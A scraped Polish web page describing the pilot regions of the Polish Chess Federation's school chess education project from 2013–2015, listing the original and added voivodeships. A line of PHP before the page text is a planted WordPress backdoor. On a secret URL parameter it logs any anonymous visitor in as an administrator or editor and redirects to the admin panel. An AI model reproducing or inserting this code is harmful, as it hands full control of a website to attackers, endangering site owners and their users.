// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Ośrodki pilotażu – Edukacja przez Szachy w Szkole

Ośrodki pilotażu

W latach 2013 – 2015 Ogólnopolski Projekt Polskiego Związku Szachowego „Edukacja przez Szachy w Szkole” uruchomiony zostanie na zasadzie pilotażu w kilku wybranych województwach w Polsce.

Jako podstawowe ośrodki pilotażu pierwotnie wybrane zostały: województwo mazowieckie (ze szczególnym uwzględnieniem miasta stołecznego Warszawy), województwo dolnośląskie, województwo świętokrzyskie i województwo podlaskie. Istnieje jednak możliwość, że po dalszych rozmowach działaczy związków wojewódzkich z samorządami, pilotaż zostanie rozszerzony na inne województwa – Polski Związek Szachowy otwarty jest na wszelkie propozycje współpracy.

W 2014 roku Zarząd Polskiego Związku Szachowego podjął decyzję o dołączeniu do Projektu trzech kolejnych województw: województwa lubelskiego, śląskiego i warmińsko – mazurskiego.

 

Szkoły w projekcie